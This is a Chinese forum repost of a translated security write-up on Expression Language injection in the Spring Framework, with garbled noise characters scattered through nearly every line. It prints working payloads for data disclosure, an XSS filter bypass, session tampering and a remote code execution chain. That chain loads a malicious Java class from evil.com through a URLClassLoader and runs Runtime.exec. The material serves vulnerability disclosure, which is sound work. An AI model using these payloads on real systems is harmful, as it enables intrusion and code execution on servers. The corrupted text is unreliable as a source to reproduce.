Remote Code with3 _# N1 p' G5 c5 A
Expression Language Injection1 C3 v# r% j4 u* M) H, p
Spring Framework脆弱性—DanAmodio" ~4 f5 c% ^, _% S5 v, O
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中6 K6 x, o5 J, \4 r: ~
可能会存在风险。
+ _+ ?$ C% r3 ^在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
% _% W9 @; [; @ W4 L" v% s- Y" oArshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可' f& `& ^6 u% K8 e
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
/ D- D/ e* t" c& P' j! E以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
+ p* [# w0 C4 `0 q) v版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。; e, ]; _' ]/ I. H8 u, E. K
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
: ^' B) s) u V* u( J, C% R- F. r我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
+ B/ w% S: Q; h& n, J本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
# |" R k$ F" j4 D; W* f这些版本不支持禁用double EL resolution.
; U* u- r! E$ S+ ?3 x$ w这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含% V$ Q! R! g% g1 k$ x
EL2.2容器上可能进行远程代码执行。
, a( P5 P9 }. x( ~7 @( o这是一个原始信息泄露的攻击例子:, w! r9 B. u' {: T j0 Z) R
请求:
# M# ]2 q$ i! Dttp://vulnerable.com/foo?message=${applicationScope}/ b: C1 m. Y% A- ~1 F# D9 H
到达以下内容页面:. f8 j6 e; m7 b% l, X; o
结果将输出一些包含内部服务器信息calsspath 和本地工作目录% _; [: p/ g% G7 e9 G
你也可以做一些其他事情,如这样:& K3 r1 A# Z% |0 g" C x
${9999+1}
. m* ]" d8 `9 ~" [. C0 o还可以访问session 对象和beans# l" d: k& S( c8 [
${employee.lastName}( z# i: r" V A: i; I
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
) P: a6 {1 w9 f# k I6 }: wEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东: k0 e3 J" I- ^& C
西,比如XSS.
% r/ Q4 K5 W, a# {$ N( b0 m哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
{3 u; m! G% \1 p b9 w+ t! h& R突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤0 k: c" ?; I& q5 ^. \& M
呢?”+ {, @0 z1 E9 X* G( q* d
因此,我尝试巳缦拢�
" i, N- `6 a! x! e! Fhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP- G5 I$ y' o* b
P
5 ~! B! \8 N7 ^9 V5 [我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
- T6 L: F) `! o1 `' k( P D回的文本被插入进了spring:message 标签。
: b) ?1 Q( r& F/ K) z这里是一个最终绕过过滤的实例:# y8 p w9 `( y1 [# I& F
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ) G; a( H5 v0 [$ y8 \8 `" u3 r
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
6 k3 @1 E7 S& L7 K什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
9 \) o$ Y, Y) T/ m# ]- Z经过一番研究,我学习到EL2.2 增加了方法调用。& q9 [# _. ^0 Q' |3 M Q2 }
我写了一个快速测试应用程序代码并且检测一些功能
* G, E1 T' k h${pageContext.request.getSession().setAttribute(“account”,”123456″)}: o \2 u, [# t& i# u6 f4 r# H8 B6 g
${pageContext.request.getSession().setAttribute(“admin”,true)}
! T7 Z# L- h; X1 D$ S# o" x好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
- j8 V* v7 j, e2 } U. V指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
" T$ C7 O% j# h7 h8 i4 m* N# s${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
2 A6 a) g" W! S R8 R' P5 g% r# m$ Y“, 1234)}: B; L! A0 {' ?2 C
${“”.getClass().forName(“java.lang.Runtime”)}" V# S: j, b: B
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不# a1 S$ J( i5 ?
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
7 t4 R* X: t. }+ h数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有, X2 Y& V9 j+ r- k! ~" v& Y
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
$ Z, d7 ?$ j- t方法签名invoke(Object obj, Object„ args)9 [2 P& p6 p# v8 d* B& a
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问9 m1 H) G" h. y" ]0 o
题,以让它可以工作起来。
! _) |$ P% J" z漏洞利用:, |) ^7 }" {/ l" N
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
: J' ?7 }0 ?: Z3 u; j% i5 P; _希望你们中的一些JAVA奇才告诉我我是如此的可笑。1 F6 I3 w) @* \. r
这里有一些我试过的失败的用例,为了试图让它工作的用例:! ?2 F; ?6 A6 S: ~. N4 Y S
写文件到文件系统$ S2 `& p% M3 g1 F) K7 r
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
% H5 K' r: I% i& D/ Z我认为这些可以很好的工作,但是我不能找到合适的类来载入。
9 ^ z, l0 f7 Z; h/ h) D9 {${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}! ?1 Y# Y( j( g
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
! X' Q! |4 A& { D; b1 N1 M# Gorg.springframework.expression.spel.standard.SpelExpressionParser not found
0 Q- l( |9 q0 @, O7 fby
7 s3 y2 r1 U) Z/ D+ U4 Worg.glassfish.web.javax.servlet.jsp [194].$ g9 s1 D5 L0 f3 L* J b2 T ^. X8 I9 S
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
* c( M. _5 A1 ? 利用反射来创建一个新的Runtime(and watch the world burn)
4 ?9 B2 O- I; E. B, Q+ D4 x- a& h5 r${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName, f( {1 p1 ~5 S. v' t. k) ]: z% r
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}! Y& F8 n- ]/ ]$ @ @
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
2 K! r2 D( H; [+ A 使用java.lang.ProcessBuilder8 Q/ b& U4 d2 j& m) |* T2 | j
用表达式语言来评估表达式语言" `& r' e9 C1 p% @6 P3 M, v$ L6 t9 ?
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
" A/ r2 g7 x6 W) P${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
5 e. \7 n; w0 U. v2 j: ? B“,”".getClass(),null)}/ U( [) d* o: g6 o* f
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
8 D" ~8 H* c, g" {我在使用一个空数组通过Method.invoke()时失败了很多次3 a& c/ A# p ^* g# S: u% G6 l5 D
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo" C/ M5 K5 g$ D$ V7 R
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A+ t Z7 c- Q/ k
rrayList”).newInstance().toArray())
0 H; s- S0 z0 h- e) z6 @7 z1 O7 M! Mjava.lang.IllegalArgumentException: wrong number of arguments
# v' l; x+ n6 \; c' }& P& [0 K最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
% O/ o, l' c2 p6 m以创建一个恶意class文件并且指向类装载器.% r: W* p9 p- |6 a
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
. Y4 n0 F& v8 }, O) e) Vpublic class Malicious {
# [/ E" E" |! r( h& ?( M8 _$ {public Malicious() {
( `' ~2 `3 Y& D/ J$ ~try {
* F" E% P; r, y; L; m! njava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac. {2 R! U1 P3 ]6 z+ B
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win. b3 i( B1 Z5 h
} catch (Exception e) {4 i- H9 x H7 a6 ?% k& a( o; K q
}; b: y/ R P6 V4 m
}
7 s. O# ^( v0 G1 ]& B4 p我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回2 N( e" _+ Z5 N/ F5 _4 A
话中,因此它可以被使用.- P" q3 ]5 o' V" y+ x7 h' O
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName$ `2 c( d9 M+ R( H* Q4 f
(“java.util.ArrayList”).newInstance())}% E- q' k, H! X$ m! F) q
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
: ^0 W+ |% {7 K- g一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
* h/ i3 \* `) [/ V2 p9 DgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个* ~* |; y. I4 i) G1 a8 _9 y
我们可以调用的create(string)方法,然后转换对一个URL对象。4 V# T0 p; `0 Y ^/ b
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh) ?% X+ [ c( I9 M( J) s
ere/malicious/classfile/is/located/”).toURL())}
% r/ o) M( I! N& y7 }$ x然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,9 Y4 } D' z$ y$ L: ^* p( |
恶意类文件被装载并创建,触发远程代码.7 w! X5 Y% Y$ o; p" S
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte+ U: \4 j8 A3 `9 M
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().4 Y( S8 G3 D! J0 y
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance! p2 j7 R+ O# W0 P' O
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对